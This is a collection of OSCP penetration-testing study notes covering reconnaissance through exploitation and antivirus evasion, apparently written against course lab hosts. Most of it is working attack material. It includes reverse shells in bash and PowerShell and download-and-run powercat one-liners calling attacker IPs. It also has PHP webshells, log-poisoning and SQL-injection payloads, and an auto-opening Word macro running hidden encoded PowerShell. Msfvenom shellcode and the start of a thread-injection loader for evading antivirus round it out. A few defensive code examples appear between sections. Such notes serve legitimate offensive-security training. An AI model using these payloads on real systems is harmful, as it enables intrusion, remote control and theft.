Notes from 杨CC

Source: https://github.com/TopRedTeam/OSCP2024/releases

OSCP2024

A record of my OSCP study process; corrections from fellow practitioners are welcome.

Approach: record mainly the useful material (the textbook carries a lot of filler).

Study plan:

1-Work through the textbook: 24 chapters in total; the first five are mostly filler, so notes start from chapter 6, with the goal of finishing one chapter per day

2-Practice machines: free Vulnhub machines, working through those similar to OSCP

3-Official labs: sign up for the official labs (not cheap; skip if funds are short)


This post covers chapter 6 of the textbook, split into "passive information gathering" and "active information gathering", recording the tools and commands used.

6.2 Passive information gathering

6.2.1 whois enumeration

Look up a domain (-h specifies the whois server)

whois megacorpone.com -h 192.168.50.251

Look up an IP

whois 38.100.193.70 -h 192.168.50.251

6.2.2 Google hacking

Restrict results to a domain

site:megacorpone.com

Show a specified file type

site:megacorpone.com filetype:txt

Exclude a file type

site:megacorpone.com -filetype:html

Find directory listings

intitle:"index of" "parent directory"

Further references

https://www.exploit-db.com/google-hacking-database
https://dorksearch.com/

Netcraft

Address

searchdns.netcraft.com

Open source code

Sites

https://github.com/
https://gist.github.com/
https://about.gitlab.com/
https://sourceforge.net/

Search for specified files

owner:megacorpone path:users

Tools

https://github.com/michenriksen/gitrob
https://github.com/zricethezav/gitleaks

Command

gitleaks-linux-arm64 -v -r=https://github.com/xxx/xxx

Shodan

Search by host

hostname:megacorpone.com

Add port information

hostname:megacorpone.com port:"22"

Security Headers and SSL/TLS

Sites

https://securityheaders.com/
https://www.ssllabs.com/ssltest/

6.3 Active information gathering

6.3.1 DNS enumeration

DNS record types

NS: Nameserver records contain the name of the authoritative servers hosting the DNS records for a domain.
A: Also known as a host record, the "a record" contains the IPv4 address of a hostname (such as www.megacorpone.com).
AAAA: Also known as a quad A host record, the "aaaa record" contains the IPv6 address of a hostname (such as www.megacorpone.com).
MX: Mail Exchange records contain the names of the servers responsible for handling email for the domain. A domain can contain multiple MX records.
PTR: Pointer Records are used in reverse lookup zones and can find the records associated with an IP address.
CNAME: Canonical Name Records are used to create aliases for other host records.
TXT: Text records can contain any arbitrary data and be used for various purposes, such as domain ownership verification.

Look up a domain's IP

host www.megacorpone.com

Look up mail servers and other record types

host -t mx megacorpone.com
host -t txt megacorpone.com

Enumerate the IPs for a list of hostnames

for ip in $(cat list.txt); do host $ip.megacorpone.com; done

Enumerate the hostnames for a range of IPs (reverse lookup)

for ip in $(seq 200 254); do host 51.222.169.$ip; done | grep -v "not found"

Automated enumeration with tools

dnsrecon -d megacorpone.com -t std
dnsrecon -d megacorpone.com -D ~/list.txt -t brt
dnsenum megacorpone.com

A record lookup

nslookup mail.megacorptwo.com

Query a specified DNS server

nslookup -type=TXT info.megacorptwo.com 192.168.50.151

Port scanning with netcat

-w timeout in seconds
-z zero-I/O mode (no data sent)

TCP

nc -nvv -w 1 -z 192.168.50.152 3388-3390

UDP

nc -nv -u -z -w 1 192.168.50.149 120-123

Nmap port scanning

Default scan

nmap 192.168.50.149

Full port scan

nmap -p 1-65535 192.168.50.149

SYN scan

sudo nmap -sS 192.168.50.149

TCP connect scan

nmap -sT 192.168.50.149

UDP scan

sudo nmap -sU 192.168.50.149

UDP + SYN scan

sudo nmap -sU -sS 192.168.50.149

Live host discovery

nmap -sn 192.168.50.1-253

nmap -v -sn 192.168.50.1-253 -oG ping-sweep.txt
grep Up ping-sweep.txt | cut -d " " -f 2

Enumerate a specified port and service across the network

nmap -p 80 192.168.50.1-253 -oG web-sweep.txt
grep open web-sweep.txt | cut -d" " -f2

Top 20 port scan

nmap -sT -A --top-ports=20 192.168.50.1-253 -oG top-port-sweep.txt

OS fingerprinting

sudo nmap -O 192.168.50.14 --osscan-guess

Service enumeration

nmap -sT -A 192.168.50.14

Nmap script scan

nmap --script http-headers 192.168.50.6

PowerShell port scanning

Test-NetConnection -Port 445 192.168.50.151

1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("192.168.50.151", $_)) "TCP port $_ is open"} 2>$null

SMB enumeration

Nmap port scan (139, 445)

nmap -v -p 139,445 -oG smb.txt 192.168.50.1-254

UDP port 137 enumeration (-r option)

sudo nbtscan -r 192.168.50.0/24

Related Nmap scripts

ls -1 /usr/share/nmap/scripts/smb*
nmap -v -p 139,445 --script smb-os-discovery 192.168.50.152

View SMB shares

net view \\dc01 /all

SMTP enumeration

Enumerate users on the host

nc -nv 192.168.50.8 25
VRFY root
VRFY idontexist

Automated script

#!/usr/bin/python3

import socket
import sys

if len(sys.argv) != 3:
    print("Usage: vrfy.py <username> <target_ip>")
    sys.exit(0)

# Create a socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Connect to the server
ip = sys.argv[2]
connect = s.connect((ip, 25))

# Receive the banner
banner = s.recv(1024)

print(banner)

# VRFY a user
user = (sys.argv[1]).encode()
s.send(b'VRFY ' + user + b'\r\n')
result = s.recv(1024)

print(result)

# Close the socket
s.close()

Usage

python3 smtp.py root 192.168.50.8

PowerShell enumeration

Test-NetConnection -Port 25 192.168.50.8
telnet 192.168.50.8 25
VRFY root

SNMP enumeration

Windows SNMP OIDs

1.3.6.1.2.1.25.1.6.0    System Processes
1.3.6.1.2.1.25.4.2.1.2  Running Programs
1.3.6.1.2.1.25.4.2.1.4  Processes Path
1.3.6.1.2.1.25.2.3.1.4  Storage Units
1.3.6.1.2.1.25.6.3.1.2  Software Name
1.3.6.1.4.1.77.1.2.25   User Accounts
1.3.6.1.2.1.6.13.1.3    TCP Local Ports

Nmap scan of UDP port 161

sudo nmap -sU --open -p 161 192.168.50.1-254 -oG open-snmp.txt

echo public > community
echo private >> community
echo manager >> community
for ip in $(seq 1 254); do echo 192.168.50.$ip; done > ips
onesixtyone -c community -i ips

Automated tools

snmpwalk -c public -v1 -t 10 192.168.50.151

Enumerate Windows users

snmpwalk -c public -v1 192.168.50.151 1.3.6.1.4.1.77.1.2.25

Enumerate Windows processes

snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.25.4.2.1.2

Enumerate installed software

snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.25.6.3.1.2

Enumerate open ports

snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.6.13.1.3

This post covers chapter 7 of the textbook, "Nmap vulnerability scanning", recording the tools and commands used.

7.3 Nmap vulnerability scanning

7.3.1 NSE scripts

List the Nmap vulnerability-scanning scripts

cd /usr/share/nmap/scripts/
cat script.db | grep "\"vuln\""

Run the scripts

sudo nmap -sV -p 443 --script "vuln" 192.168.50.124

7.3.2 Adding NSE scripts

Google search

CVE-2021-41773 nse

Add the script

sudo cp /home/kali/Downloads/http-vuln-cve-2021-41773.nse /usr/share/nmap/scripts/http-vuln-cve2021-41773.nse
sudo nmap --script-updatedb

Run the new script

sudo nmap -sV -p 443 --script "http-vuln-cve2021-41773" 192.168.50.124

This post covers chapter 8 of the textbook, "web analysis tools" and "web application enumeration", recording the tools and commands used.

8.2 Web analysis tools

8.2.1 Web server fingerprinting

Nmap scan of the web service

sudo nmap -p80  -sV 192.168.50.20

HTTP enumeration

sudo nmap -p80 --script=http-enum 192.168.50.20

8.2.2 Wappalyzer

Site

https://www.wappalyzer.com/

8.2.3 Directory enumeration

gobuster dir -u 192.168.50.20 -w /usr/share/wordlists/dirb/common.txt -t 5

8.2.4 Burp

Operated through the GUI

8.3 Web application enumeration

8.3.2 HTTP header and sitemap enumeration

curl https://www.google.com/robots.txt

8.3.3 API enumeration

gobuster dir -u http://192.168.50.16:5002 -w /usr/share/wordlists/dirb/big.txt -p pattern

curl -i http://192.168.50.16:5002/users/v1

gobuster dir -u http://192.168.50.16:5002/users/v1/admin/ -w /usr/share/wordlists/dirb/small.txt
curl -i http://192.168.50.16:5002/users/v1/admin/password
This may return an error; usually POST or PUT is required, and a successful login first
curl -i http://192.168.50.16:5002/users/v1/login
Reports an invalid user; try the admin user
curl -d '{"password":"fake","username":"admin"}' -H 'Content-Type: application/json' http://192.168.50.16:5002/users/v1/login
Reports a wrong password; register a new user
curl -d '{"password":"lab","username":"offsecadmin"}' -H 'Content-Type: application/json' http://192.168.50.16:5002/users/v1/register
Reports that an email is required; add the email parameter and register again
curl -d '{"password":"lab","username":"offsec","email":"pwn@offsec.com","admin":"True"}' -H 'Content-Type: application/json' http://192.168.50.16:5002/users/v1/register
Registration succeeds; log in
curl -d '{"password":"lab","username":"offsec"}' -H 'Content-Type: application/json' http://192.168.50.16:5002/users/v1/login
Login succeeds; with the token, try to change the admin password
curl \
'http://192.168.50.16:5002/users/v1/admin/password' \
-H 'Content-Type: application/json' \
-H 'Authorization: OAuth eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDkyNzEyMDEsImlhdCI6MTY0OTI3MDkwMSwic3ViIjoib2Zmc2VjIn0.MYbSaiBkYpUGOTH-tw6ltzW0jNABCDACR3_FdYLRkew' \
-d '{"password": "pwned"}'
Method not allowed; try PUT
curl -X 'PUT' \
'http://192.168.50.16:5002/users/v1/admin/password' \
-H 'Content-Type: application/json' \
-H 'Authorization: OAuth eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDkyNzE3OTQsImlhdCI6MTY0OTI3MTQ5NCwic3ViIjoib2Zmc2VjIn0.OeZH1rEcrZ5F0QqLb8IHbJI7f9KaRAkrywoaRUAsgA4' \
-d '{"password": "pwned"}'
The change succeeds; log in as admin
curl -d '{"password":"pwned","username":"admin"}' -H 'Content-Type: application/json' http://192.168.50.16:5002/users/v1/login
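The register request above was accepted with an "admin" field chosen by the client. As an added example (not code from the course or from the lab API), a registration handler that builds the stored record only from an allowlist of client-settable fields, so a privilege flag in the request body is dropped and can be logged instead; the field names match the JSON bodies above, and the password-hashing scheme is an assumption of this example.

```python
import hashlib
import os
from typing import Any, Dict, List, Optional

# Fields a self-registration request may set. The page's API also honoured "admin",
# which is what let a freshly registered user be created as an administrator.
CLIENT_SETTABLE = {"username", "password", "email"}


class RegistrationError(ValueError):
    """Raised when a registration body cannot be accepted."""


def unexpected_fields(body: Dict[str, Any]) -> List[str]:
    """Fields the client sent that registration must not honour. A request carrying
    "admin" or similar is worth logging: it is a tampering attempt, not a typo."""
    return sorted(set(body) - CLIENT_SETTABLE)


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """PBKDF2-HMAC-SHA256 with a random 16-byte salt (scheme chosen for this example)."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 200_000)
    return f"pbkdf2_sha256${salt.hex()}${digest.hex()}"


def build_user(body: Dict[str, Any]) -> Dict[str, Any]:
    """Return the record to store. Every privilege attribute is set by the server."""
    missing = CLIENT_SETTABLE - set(body)
    if missing:
        # Same behaviour the page observed: the API demanded an email before registering.
        raise RegistrationError(f"missing field(s): {sorted(missing)}")
    return {
        "username": body["username"],
        "email": body["email"],
        "password_hash": hash_password(body["password"]),
        "admin": False,  # never copied from the request body
    }


if __name__ == "__main__":
    # The exact body from the page's register step, constructed inline.
    request = {"password": "lab", "username": "offsec",
               "email": "pwn@offsec.com", "admin": "True"}
    print("ignored fields:", unexpected_fields(request))
    print(build_user(request))
```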


This post covers chapter 9 of the textbook, "directory traversal", "file inclusion", "file upload" and "command execution", recording the tools and commands used.

9.1 Directory traversal

9.1.2 Exploiting directory traversal

http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../etc/passwd
http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../home/offsec/.ssh/id_rsa

curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../home/offsec/.ssh/id_rsa

ssh -i dt_key -p 2222 offsec@mountaindesserts.com
Complains that the key file permissions are too open
chmod 400 dt_key
ssh -i dt_key -p 2222 offsec@mountaindesserts.com

9.1.3 Encoding

URL encoding

curl http://192.168.50.16/cgi-bin/../../../../etc/passwd
If this does not work, try URL encoding

curl http://192.168.50.16/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
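The two requests above differ only in whether the traversal sequence is URL-encoded, which is why a filter on the literal string "../" is not enough. As an added example (not code from the course), a resolver for a ?page= parameter that percent-decodes the value before normalizing it and refuses anything that resolves outside the web root; the web root path and the page names are constructed for the demonstration.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

WEB_ROOT = "/var/www/meteor"  # constructed web root for the demonstration


def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode until the value stops changing, so "%252e%252e" (double-encoded)
    and "%2e%2e" both end up as "..". The round limit bounds the work per request."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_page(page: str, web_root: str = WEB_ROOT) -> Optional[str]:
    """Return the absolute path a ?page= value maps to, or None if it leaves web_root.

    The decision is made on the normalized path rather than on the raw string, so
    "pages/../../etc/passwd" is rejected even though it does not start with "../",
    while "pages/../index.php" is still accepted because it stays inside the root.
    """
    decoded = decode_fully(page)
    if "\x00" in decoded:  # NUL bytes have no place in a page name
        return None
    relative = decoded.lstrip("/")  # an absolute value must not escape the root either
    candidate = posixpath.normpath(posixpath.join(web_root, relative))
    if candidate != web_root and not candidate.startswith(web_root + "/"):
        return None
    return candidate


if __name__ == "__main__":
    for value in ("admin.php",
                  "../../../../../../../../../etc/passwd",
                  "%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
                  "%252e%252e/etc/passwd",
                  "pages/../index.php"):
        print(f"{value!r:45} -> {resolve_page(value)}")
```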

9.2 File inclusion

9.2.1 Local file inclusion

curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log

Put a webshell in the User-Agent header

<?php echo system($_GET['cmd']); ?>

It gets written into this file

../../../../../../../../../var/log/apache2/access.log

curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log&cmd=ls%20-la

Reverse shell

bash -c "bash -i >& /dev/tcp/192.168.119.3/4444 0>&1"

URL encoded

bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.119.3%2F4444%200%3E%261%22

9.2.2 PHP wrappers

File read

curl http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resource=admin.php

base64 decode

echo "PCFET0NUWVBFIGh……" | base64 -d

Command execution

curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain,<?php%20echo%20system('ls');?>"

base64 encoded

echo -n '<?php echo system($_GET["cmd"]);?>' | base64

curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls"

9.2.3 Remote file inclusion

/usr/share/webshells/php/simple-backdoor.php
python3 -m http.server 80
curl "http://mountaindesserts.com/meteor/index.php?page=http://192.168.119.3/simple-backdoor.php&cmd=ls"

9.3 File upload

9.3.1 Executable files

File extensions

.phps
.php7
.php
.phtml
.pHP

Upload with a modified extension

/usr/share/webshells/php/simple-backdoor.pHP

Command execution on Windows with a base64-encoded command

pwsh
$Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.119.3",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText

Run the encoded command through the webshell

curl http://192.168.50.189/meteor/uploads/simple-backdoor.pHP?cmd=powershell%20-enc%20JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAMQA4AC4AMgAgAC0AcAA...

9.3.2 Non-executable files

POST upload with directory traversal in the filename

../../../../../../../test.txt

Generate an SSH key pair (enter fileup as the key file name at the prompt)

ssh-keygen
fileup
cat fileup.pub > authorized_keys

Change the filename to

../../../../../../../root/.ssh/authorized_keys

After uploading, connect over SSH

rm ~/.ssh/known_hosts
ssh -p 2222 -i fileup root@mountaindesserts.com

Note: the fileup key file permissions must be 600 or 400

9.4 Command execution

9.4.1 Command injection

Injecting a command through the parameter

curl -X POST --data 'Archive=ipconfig' http://192.168.50.189:8000/archive

Reports that it cannot be executed; try the expected command, git

curl -X POST --data 'Archive=git' http://192.168.50.189:8000/archive
curl -X POST --data 'Archive=git version' http://192.168.50.189:8000/archive

Executes successfully; chain a second command with %3B (a URL-encoded semicolon)

curl -X POST --data 'Archive=git%3Bipconfig' http://192.168.50.189:8000/archive

Determine whether the current shell is cmd or PowerShell

(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell
URL encoded

curl -X POST --data 'Archive=git%3B(dir%202%3E%261%20*%60%7Cecho%20CMD)%3B%26%3C%23%20rem%20%23%3Eecho%20PowerShell' http://192.168.50.189:8000/archive

The output is PowerShell

Execution succeeds; use powercat to get a reverse shell

cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .
python3 -m http.server 80
nc -nvlp 4444

PowerShell command to run

IEX (New-Object System.Net.Webclient).DownloadString("http://192.168.119.3/powercat.ps1");powercat -c 192.168.119.3 -p 4444 -e powershell 

URL encoded

curl -X POST --data 'Archive=git%3BIEX%20(New-Object%20System.Net.Webclient).DownloadString(%22http%3A%2F%2F192.168.119.3%2Fpowercat.ps1%22)%3Bpowercat%20-c%20192.168.119.3%20-p%204444%20-e%20powershell' http://192.168.50.189:8000/archive

This post covers chapter 10 of the textbook, "SQL and database basics", "SQL injection" and "automated code execution", recording the tools and commands used.

10.1 SQL and database basics

10.1.2 Database basics

Log in to MySQL

mysql -u root -p'root' -h 192.168.50.16 -P 3306

Check the database version

select version();

Check the system user

select system_user();

List the databases

show databases;

Query data in a specific table

SELECT user, authentication_string FROM mysql.user WHERE user = 'offsec';

Log in to MSSQL

impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth

Check the version

SELECT @@version;

List the databases

SELECT name FROM sys.databases;

List the tables

SELECT * FROM offsec.information_schema.tables;

Query a specific table

select * from offsec.dbo.users;

10.2 SQL injection

10.2.1 Error-based SQL injection

Example

<?php
$uname = $_POST['uname'];
$passwd =$_POST['password'];

$sql_query = "SELECT * FROM users WHERE user_name= '$uname' AND password='$passwd'";
$result = mysqli_query($con, $sql_query);
?>

Username input

offsec' OR 1=1 -- //

The SQL statement executed is

SELECT * FROM users WHERE user_name= 'offsec' OR 1=1 --

which bypasses the password check and logs in successfully.
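As an added example (not code from the course), the login query above rebuilt on an in-memory SQLite table so the bypass can be reproduced next to the parameterized form of the same query; the table, its rows and the wrong password are constructed for the demonstration.

```python
import sqlite3
from typing import List, Tuple

# The username input from the page; the password sent alongside it is deliberately wrong.
PAYLOAD = "offsec' OR 1=1 -- //"


def make_db() -> sqlite3.Connection:
    """In-memory users table with two constructed accounts."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user_name TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("offsec", "correct-horse"), ("admin", "s3cret")])
    return con


def login_vulnerable(con: sqlite3.Connection, uname: str, passwd: str) -> List[Tuple[str, str]]:
    """Same construction as the PHP snippet: the input is pasted into the SQL text, so the
    quote closes the literal, OR 1=1 matches every row and -- comments out the password check."""
    sql_query = f"SELECT * FROM users WHERE user_name= '{uname}' AND password='{passwd}'"
    return con.execute(sql_query).fetchall()


def login_safe(con: sqlite3.Connection, uname: str, passwd: str) -> List[Tuple[str, str]]:
    """Parameterized form: the driver binds the values, so the quote and the comment
    marker are compared as part of the username and never change the statement."""
    sql_query = "SELECT * FROM users WHERE user_name= ? AND password= ?"
    return con.execute(sql_query, (uname, passwd)).fetchall()


if __name__ == "__main__":
    con = make_db()
    print("concatenated:", login_vulnerable(con, PAYLOAD, "wrong"))  # every row comes back
    print("parameterized:", login_safe(con, PAYLOAD, "wrong"))       # no row
```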

Usually test with a single quote first

offsec'

If an error message comes back, injection can be attempted; get the database version

' or 1=1 in (select @@version) -- //

Query data in the table

' OR 1=1 in (SELECT * FROM users) -- //

If that errors, try a single column

' or 1=1 in (SELECT password FROM users) -- //

Query a specific user's password

' or 1=1 in (SELECT password FROM users WHERE username = 'admin') -- //

10.2.2 UNION-based SQL injection

For example

$query = "SELECT * from customers WHERE name LIKE '".$_POST["search_input"]."%'";

Input

' ORDER BY 1-- //

Either an error appears or the column count is found, for example 6

%' UNION SELECT database(), user(), @@version, null, null -- //

The UNION runs the appended query, but the data types must match the original columns or the results are not displayed; if they do not match, change the positions

' UNION SELECT null, null, database(), user(), @@version  -- //

' union select null, table_name, column_name, table_schema, null from information_schema.columns where table_schema=database() -- //

' UNION SELECT null, username, password, description, null FROM users -- //

Table names, column names and data can all be queried this way

10.2.3 Blind injection

With no error and no output, use time-based blind injection

http://192.168.50.16/blindsqli.php?user=offsec' AND 1=1 -- //

If it returns true, use the sleep function to confirm

http://192.168.50.16/blindsqli.php?user=offsec' AND IF (1=1, sleep(3),'false') -- //

10.3 Automated code execution

10.3.1 Code execution

Running commands from MSSQL

impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

EXECUTE xp_cmdshell 'whoami';

Writing a webshell through a UNION query

' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //

PHP webshell

<? system($_REQUEST['cmd']); ?>

10.3.2 Automation

sqlmap (-p selects the parameter)

Test for injection

sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user

Dump data

sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user --dump

Injection from a captured request

sqlmap -r post.txt -p item  --os-shell  --web-root "/var/www/html/tmp"

This post covers chapter 11 of the textbook, "client-side attack target enumeration", "Office attacks" and "abusing Windows library files", recording the tools and commands used.

11.1 Client-side attack target enumeration

11.1.1 Information gathering

site:example.com filetype:pdf

Use gobuster's -x option to specify file extensions, download the files, and inspect their metadata

exiftool -a -u brochure.pdf

Note the author, application version, and so on

11.1.2 Client fingerprinting

Site

https://canarytokens.com/

11.2 Office attacks

11.2.3 Word macros (lateral movement)

File extensions

.doc
.docm

Run PowerShell from the macro

IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell

$Text = "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell"
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText

When added to the macro, the string has to be split into lines of 50 characters

str = "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGU"

n = 50

# Emit one VBA concatenation line per 50-character chunk
for i in range(0, len(str), n):
    print("Str = Str + " + '"' + str[i:i+n] + '"')

Complete macro

Sub AutoOpen()
MyMacro
End Sub

Sub Document_Open()
MyMacro
End Sub

Sub MyMacro()
Dim Str As String

Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU"
Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd"
Str = Str + "AAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwB"
...
Str = Str + "QBjACAAMQA5ADIALgAxADYAOAAuADEAMQA4AC4AMQAgAC0AcAA"
Str = Str + "gADQANAA0ADQAIAAtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsA"
Str = Str + "A== "

CreateObject("Wscript.Shell").Run Str
End Sub

11.3 Abusing Windows library files

11.3.1 Exploitation

Files involved

.Library-ms
.lnk

Install WebDAV

pip3 install wsgidav

Start WebDAV

mkdir /home/kali/webdav
touch /home/kali/webdav/test.txt
/home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav/

Create the config.Library-ms file

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://192.168.119.2</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

The url element holds the WebDAV address

Create the automatic_configuration.lnk file

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.3:8000/powercat.ps1');
powercat -c 192.168.119.3 -p 4444 -e powershell"

Put both files in the WebDAV directory, then send config.Library-ms to the user, by email or over SMB

cd webdav
rm test.txt
smbclient //192.168.50.195/share -c 'put config.Library-ms'

When a user opens the folder, a reverse shell comes back


This post covers chapter 12 of the textbook, "online exploit databases", "offline exploit databases" and "exploitation", recording the tools and commands used.

12.2 Online exploit databases

Sites

https://www.exploit-db.com/
https://packetstormsecurity.com/
https://github.com/
firefox --search "Microsoft Edge site:exploit-db.com"

12.3 Offline exploit databases

12.3.1 MSF

12.3.2 SearchSploit

Update the database

sudo apt update && sudo apt install exploitdb

View the exploit database files

ls -1 /usr/share/exploitdb/
ls -1 /usr/share/exploitdb/exploits

Search for a specified exploit

searchsploit remote smb microsoft windows

Copy to the current directory

searchsploit -m windows/remote/48537.py
searchsploit -m 42031

12.3.3 NSE scripts

grep Exploits /usr/share/nmap/scripts/*.nse

nmap --script-help=clamav-exec.nse

12.4 Exploitation

12.4.1 Exploitation

Identify the web application

<div class="copyright">
<a href="http://qdpm.net" target="_blank">qdPM 9.1</a> <br /> Copyright &copy; 2022 <a href="http://qdpm.net" target="_blank">qdpm.net</a>
</div>

Search exploit-db for "qdPM 9.1"

searchsploit -m 50944

python3 50944.py -url http://192.168.50.11/project/ -u george@AIDevCorp.org -p AIDevCorp
curl http://192.168.50.11/project/uploads/users/420919-backdoor.php?cmd=whoami
curl http://192.168.50.11/project/uploads/users/420919-backdoor.php --data-urlencode "cmd=which nc"
nc -lvnp 6666
curl http://192.168.50.11/project/uploads/users/420919-backdoor.php --data-urlencode "cmd=nc -nv 192.168.50.129 6666 -e /bin/bash"

This post covers chapter 13 of the textbook, "modifying memory corruption exploits" and "modifying web application exploits", recording the tools and commands used.

13.1 Modifying memory corruption exploits

searchsploit "Sync Breeze Enterprise 10.0.28"
searchsploit -m 42341

Cross-compiling

sudo apt install mingw-w64
i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe

Fails with link errors; the Winsock library has to be linked in

i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32

Common places an exploit needs modifying

Buffer size
JMP ESP address
Target IP and port
Shellcode
NOPs before the shellcode

Generate shellcode with msfvenom

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.50.4 LPORT=443 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"

Recompile after modifying

i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32

Run under Wine

sudo wine syncbreeze_exploit.exe

13.2 Modifying web application exploits

Common places to modify

http to https
SSL verification
Username and password
File names
Webshell
Fields in HTTP headers, such as csrf_param = "_sk_"

...
response = requests.post(url, data=data, allow_redirects=False)
...
response = requests.post(url, data=data, files=txt, cookies=cookies)
...
response = requests.post(url, data=data, cookies=cookies, allow_redirects=False)
...

Disable SSL verification

...
response = requests.post(url, data=data, allow_redirects=False, verify=False)
...
response = requests.post(url, data=data, files=txt, cookies=cookies, verify=False)
...
response = requests.post(url, data=data, cookies=cookies, allow_redirects=False, verify=False)
...

This post covers chapter 14 of the textbook, "key antivirus techniques" and "antivirus evasion in practice", recording the tools and commands used.

14.1 Key antivirus techniques

14.1.3 Detection methods

View a binary's signature bytes

xxd -b malware.txt

View a file's hash

sha256sum malware.txt

Changing the file's bytes changes the hash

Generate a payload with msfvenom

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.50.1 LPORT=443 -f exe > binary.exe

An unmodified payload is almost always detected

14.3 Antivirus evasion in practice

14.3.2 Evasion with thread injection

Generate PowerShell-format shellcode with msfvenom

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.50.1 LPORT=443 -f powershell -v sc

Assemble the ps1 file

$code = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';

$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;

[Byte[]];
